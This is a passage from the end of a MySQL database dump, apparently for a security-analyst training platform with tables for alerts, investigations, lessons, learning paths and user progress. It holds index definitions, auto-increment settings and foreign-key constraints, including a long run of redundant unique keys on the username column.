  ADD UNIQUE KEY `username_32` (`username`),
  ADD UNIQUE KEY `username_33` (`username`),
  ADD UNIQUE KEY `username_34` (`username`),
  ADD UNIQUE KEY `username_35` (`username`),
  ADD UNIQUE KEY `username_36` (`username`),
  ADD UNIQUE KEY `username_37` (`username`),
  ADD UNIQUE KEY `username_38` (`username`),
  ADD UNIQUE KEY `username_39` (`username`),
  ADD UNIQUE KEY `username_40` (`username`),
  ADD UNIQUE KEY `username_41` (`username`),
  ADD UNIQUE KEY `username_42` (`username`),
  ADD UNIQUE KEY `username_43` (`username`),
  ADD UNIQUE KEY `username_44` (`username`),
  ADD UNIQUE KEY `username_45` (`username`),
  ADD UNIQUE KEY `username_46` (`username`),
  ADD UNIQUE KEY `username_47` (`username`),
  ADD UNIQUE KEY `username_48` (`username`),
  ADD UNIQUE KEY `username_49` (`username`),
  ADD UNIQUE KEY `username_50` (`username`),
  ADD UNIQUE KEY `username_51` (`username`),
  ADD UNIQUE KEY `username_52` (`username`),
  ADD UNIQUE KEY `username_53` (`username`),
  ADD UNIQUE KEY `username_54` (`username`),
  ADD UNIQUE KEY `username_55` (`username`),
  ADD UNIQUE KEY `username_56` (`username`),
  ADD UNIQUE KEY `username_57` (`username`),
  ADD UNIQUE KEY `username_58` (`username`),
  ADD UNIQUE KEY `username_59` (`username`),
  ADD UNIQUE KEY `username_60` (`username`),
  ADD UNIQUE KEY `username_61` (`username`),
  ADD UNIQUE KEY `username_62` (`username`);

--
-- Indexes for table `user_alert_assignments`
--
ALTER TABLE `user_alert_assignments`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `unique_user_alert_date` (`user_id`,`alert_id`,`assigned_date`),
  ADD KEY `idx_user_date` (`user_id`,`assigned_date`);

--
-- Indexes for table `user_badges`
--
ALTER TABLE `user_badges`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `unique_user_badge` (`user_id`,`badge_id`),
  ADD KEY `badge_id` (`badge_id`),
  ADD KEY `idx_user_badges_user` (`user_id`);

--
-- Indexes for table `user_lesson_answers`
--
ALTER TABLE `user_lesson_answers`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `unique_user_question` (`user_id`,`question_id`),
  ADD KEY `question_id` (`question_id`);

--
-- Indexes for table `user_lesson_grades`
--
ALTER TABLE `user_lesson_grades`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `unique_user_task_grade` (`user_id`,`task_id`),
  ADD KEY `task_id` (`task_id`);

--
-- Indexes for table `user_operation_progress`
--
ALTER TABLE `user_operation_progress`
  ADD PRIMARY KEY (`id`),
  ADD KEY `user_id` (`user_id`),
  ADD KEY `operation_id` (`operation_id`);

--
-- Indexes for table `user_path_progress`
--
ALTER TABLE `user_path_progress`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `unique_user_path` (`user_id`,`learning_path_id`),
  ADD KEY `learning_path_id` (`learning_path_id`),
  ADD KEY `current_module_id` (`current_module_id`),
  ADD KEY `idx_user_path_user` (`user_id`);

--
-- Indexes for table `user_path_specialization`
--
ALTER TABLE `user_path_specialization`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `unique_user_path` (`user_id`,`path_code`);

--
-- Indexes for table `user_task_progress`
--
ALTER TABLE `user_task_progress`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `unique_user_task` (`user_id`,`task_id`),
  ADD KEY `idx_user_progress_user` (`user_id`),
  ADD KEY `idx_user_progress_task` (`task_id`);

--
-- Indexes for table `user_xp`
--
ALTER TABLE `user_xp`
  ADD PRIMARY KEY (`user_id`);

--
-- AUTO_INCREMENT for dumped tables
--

--
-- AUTO_INCREMENT for table `alerts`
--
ALTER TABLE `alerts`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `alert_grades`
--
ALTER TABLE `alert_grades`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `badges`
--
ALTER TABLE `badges`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `beta_signups`
--
ALTER TABLE `beta_signups`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=4;

--
-- AUTO_INCREMENT for table `blog_posts`
--
ALTER TABLE `blog_posts`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=197;

--
-- AUTO_INCREMENT for table `email_logs`
--
ALTER TABLE `email_logs`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=16;

--
-- AUTO_INCREMENT for table `feedbacks`
--
ALTER TABLE `feedbacks`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `investigations`
--
ALTER TABLE `investigations`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=608;

--
-- AUTO_INCREMENT for table `investigation_notes`
--
ALTER TABLE `investigation_notes`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `learning_paths`
--
ALTER TABLE `learning_paths`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=13;

--
-- AUTO_INCREMENT for table `lesson_content`
--
ALTER TABLE `lesson_content`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=1039;

--
-- AUTO_INCREMENT for table `lesson_questions`
--
ALTER TABLE `lesson_questions`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `mobile_lesson_completions`
--
ALTER TABLE `mobile_lesson_completions`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=117;

--
-- AUTO_INCREMENT for table `modules`
--
ALTER TABLE `modules`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=135;

--
-- AUTO_INCREMENT for table `newsletter_subscribers`
--
ALTER TABLE `newsletter_subscribers`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3;

--
-- AUTO_INCREMENT for table `notifications`
--
ALTER TABLE `notifications`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `operations`
--
ALTER TABLE `operations`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `operation_alerts`
--
ALTER TABLE `operation_alerts`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=970;

--
-- AUTO_INCREMENT for table `organizations`
--
ALTER TABLE `organizations`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `organization_invites`
--
ALTER TABLE `organization_invites`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `organization_members`
--
ALTER TABLE `organization_members`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `password_resets`
--
ALTER TABLE `password_resets`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `simulated_logs`
--
ALTER TABLE `simulated_logs`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=21;

--
-- AUTO_INCREMENT for table `student_domains`
--
ALTER TABLE `student_domains`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `tasks`
--
ALTER TABLE `tasks`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `users`
--
ALTER TABLE `users`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `user_alert_assignments`
--
ALTER TABLE `user_alert_assignments`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=1821;

--
-- AUTO_INCREMENT for table `user_badges`
--
ALTER TABLE `user_badges`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=32;

--
-- AUTO_INCREMENT for table `user_lesson_answers`
--
ALTER TABLE `user_lesson_answers`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=655;

--
-- AUTO_INCREMENT for table `user_lesson_grades`
--
ALTER TABLE `user_lesson_grades`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=210;

--
-- AUTO_INCREMENT for table `user_operation_progress`
--
ALTER TABLE `user_operation_progress`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=391;

--
-- AUTO_INCREMENT for table `user_path_progress`
--
ALTER TABLE `user_path_progress`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=400;

--
-- AUTO_INCREMENT for table `user_path_specialization`
--
ALTER TABLE `user_path_specialization`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `user_task_progress`
--
ALTER TABLE `user_task_progress`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=210;

--
-- Constraints for dumped tables
--

--
-- Constraints for table `investigations`
--
ALTER TABLE `investigations`
  ADD CONSTRAINT `investigations_ibfk_1` FOREIGN KEY (`user_id`) REFERENCES `users` (`id`) ON DELETE CASCADE,
  ADD CONSTRAINT `investigations_ibfk_2` FOREIGN KEY (`alert_id`) REFERENCES `alerts` (`id`) ON DELETE CASCADE;

--
-- Constraints for table `investigation_notes`
--
ALTER TABLE `investigation_notes`
  ADD CONSTRAINT `notes_ibfk_1` FOREIGN KEY (`user_id`) REFERENCES `users` (`id`) ON DELETE CASCADE,
  ADD CONSTRAINT `notes_ibfk_2` FOREIGN KEY (`alert_id`) REFERENCES `alerts` (`id`) ON DELETE CASCADE;

--
-- Constraints for table `lesson_content`
--
ALTER TABLE `lesson_content`
  ADD CONSTRAINT `lesson_content_ibfk_1` FOREIGN KEY (`task_id`) REFERENCES `tasks` (`id`) ON DELETE CASCADE;

--
-- Constraints for table `lesson_questions`
--
ALTER TABLE `lesson_questions`
  ADD CONSTRAINT `lesson_questions_ibfk_1` FOREIGN KEY (`task_id`) REFERENCES `tasks` (`id`) ON DELETE CASCADE;

--
-- Constraints for table `modules`
--
ALTER TABLE `modules`
  ADD CONSTRAINT `modules_ibfk_1` FOREIGN KEY (`learning_path_id`) REFERENCES `learning_paths` (`id`) ON DELETE CASCADE,
  ADD CONSTRAINT `modules_ibfk_2` FOREIGN KEY (`prerequisite_module_id`) REFERENCES `modules` (`id`) ON DELETE SET NULL;

--
-- Constraints for table `tasks`
--
ALTER TABLE `tasks`
  ADD CONSTRAINT `fk_task_alert` FOREIGN KEY (`alert_id`) REFERENCES `alerts` (`id`) ON DELETE SET NULL,
  ADD CONSTRAINT `tasks_ibfk_1` FOREIGN KEY (`module_id`) REFERENCES `modules` (`id`) ON DELETE CASCADE;

--
-- Constraints for table `user_badges`
--
ALTER TABLE `user_badges`
  ADD CONSTRAINT `user_badges_ibfk_1` FOREIGN KEY (`user_id`) REFERENCES `users` (`id`) ON DELETE CASCADE,
  ADD CONSTRAINT `user_badges_ibfk_2` FOREIGN KEY (`badge_id`) REFERENCES `badges` (`id`) ON DELETE CASCADE;

--
-- Constraints for table `user_lesson_answers`
--
ALTER TABLE `user_lesson_answers`
  ADD CONSTRAINT `user_lesson_answers_ibfk_1` FOREIGN KEY (`user_id`) REFERENCES `users` (`id`) ON DELETE CASCADE,
  ADD CONSTRAINT `user_lesson_answers_ibfk_2` FOREIGN KEY (`question_id`) REFERENCES `lesson_questions` (`id`) ON DELETE CASCADE;

--
-- Constraints for table `user_lesson_grades`
--
ALTER TABLE `user_lesson_grades`
  ADD CONSTRAINT `user_lesson_grades_ibfk_1` FOREIGN KEY (`user_id`) REFERENCES `users` (`id`) ON DELETE CASCADE,
  ADD CONSTRAINT `user_lesson_grades_ibfk_2` FOREIGN KEY (`task_id`) REFERENCES `tasks` (`id`) ON DELETE CASCADE;

--
-- Constraints for table `user_path_progress`
--
ALTER TABLE `user_path_progress`
  ADD CONSTRAINT `user_path_progress_ibfk_1` FOREIGN KEY (`user_id`) REFERENCES `users` (`id`) ON DELETE CASCADE,
  ADD CONSTRAINT `user_path_progress_ibfk_2` FOREIGN KEY (`learning_path_id`) REFERENCES `learning_paths` (`id`) ON DELETE CASCADE,
  ADD CONSTRAINT `user_path_progress_ibfk_3` FOREIGN KEY (`current_module_id`) REFERENCES `modules` (`id`) ON DELETE SET NULL;

--
-- Constraints for table `user_task_progress`
--
ALTER TABLE `user_task_progress`
  ADD CONSTRAINT `user_task_progress_ibfk_1` FOREIGN KEY (`user_id`) REFERENCES `users` (`id`) ON DELETE CASCADE,
  ADD CONSTRAINT `user_task_progress_ibfk_2` FOREIGN KEY (`task_id`) REFERENCES `tasks` (`id`) ON DELETE CASCADE;

--
-- Constraints for table `user_xp`
--
ALTER TABLE `user_xp`
  ADD CONSTRAINT `user_xp_ibfk_1` FOREIGN KEY (`user_id`) REFERENCES `users` (`id`) ON DELETE CASCADE;
COMMIT;

/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;